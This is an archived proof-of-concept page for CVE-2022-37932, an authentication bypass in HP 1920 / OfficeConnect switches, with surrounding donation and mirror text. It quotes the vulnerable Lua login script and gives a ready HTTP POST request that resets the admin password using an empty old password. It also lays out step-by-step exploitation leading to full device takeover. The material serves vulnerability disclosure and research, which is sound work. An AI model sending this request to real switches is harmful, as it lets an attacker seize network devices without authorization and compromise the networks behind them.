Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-37932 PoC — Hewlett Packard Enterprise OfficeConnect 授权问题漏洞

Source
https://github.com/Tim-Hoekstra/CVE-2022-37932
Associated Vulnerability
Title:Hewlett Packard Enterprise OfficeConnect 授权问题漏洞 (CVE-2022-37932)
Description:Hewlett Packard Enterprise OfficeConnect是美国慧与(Hewlett Packard Enterprise)公司的一系列交换机。 Hewlett Packard Enterprise OfficeConnect 1820、1850 和 1920S Network switches存在安全漏洞,该漏洞源于发现了一个潜在的安全漏洞,该漏洞可被远程利用以绕过身份验证,以下产品和版本受到影响:PT.02.14 之前版本、 在 PC.01.22 之前版本;、在 PO.01.21
Readme
# HP Switch Firmware Authentication Bypass Vulnerability

## CVE-2022-37932
 
**Firmware Version: PD.02.21**  
**Affected Devices: HP 1920 Series Smart Managed Switches**

## Overview

This repository documents a critical authentication bypass vulnerability in HP 1920 Series Smart Managed Switches running firmware version PD.02.21. The vulnerability allows an unauthenticated attacker to change the admin password without prior authentication, effectively allowing complete takeover of the device.

## Technical Details

The vulnerability exists in the `/login/default_password_cfg.lua` script, which handles changing the default password for the device. This script:

1. Accepts form POST requests without checking if the user is authenticated
2. Only verifies that the `oldPwd` parameter matches the default password (which is blank/empty)
3. Directly changes the user's password based on POST parameters

### Vulnerable Code

The key vulnerable section in `default_password_cfg.lua`:

```lua
if (request_method == 'POST') then
  -- No authentication or session checks!
  
  local defaultPassword = fpaux.string_const("FD_USER_MGR_DEFAULT_PASSWORD")
  -- ...

  if form_post.oldPwd ~= defaultPassword then
    errorStatus = "401 Unauthorized"
    errorText = label.old_password_mismatch
  else
    -- Proceeds to change password
    -- ...
  end
end
```

The script lacks critical security controls:
- No session validation
- No CSRF protection
- No rate limiting
- Direct access to password change functionality without authentication

## Proof of Concept

An attacker can exploit this vulnerability using a simple HTTP POST request:

```http
POST /login/default_password_cfg.lua HTTP/1.1
Host: [target-ip]
Content-Type: application/x-www-form-urlencoded
Content-Length: [length]

username=admin&oldPwd=&newPwd=[new-password]&confirmPwd=[new-password]
```

Note: The `oldPwd` parameter is left empty as the default password is blank.

## Impact

This vulnerability allows an unauthenticated attacker to:
1. Change the admin password without knowing any credentials
2. Gain complete administrative control over the device
3. Configure the switch, modify network settings, and potentially compromise the entire network

## Exploitation Path

1. Locate a vulnerable HP 1920 Series switch on the network
2. Send the crafted HTTP POST request directly to the device
3. Admin password is changed to attacker-controlled value
4. Attacker can now log in with the new password and full admin privileges

## Credits

Haven't had the time to research who originally discovered this vulnerability I'm just posting a Proof of Concept.

## Legal Disclaimer

This information is provided for educational purposes only. The author is not responsible for any misuse of this information. Always obtain proper authorization before testing for vulnerabilities.
File Snapshot

 [4.0K]  /data/pocs/57d397d97cac2eefbec906e7c175200755e12cff
└── [2.8K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.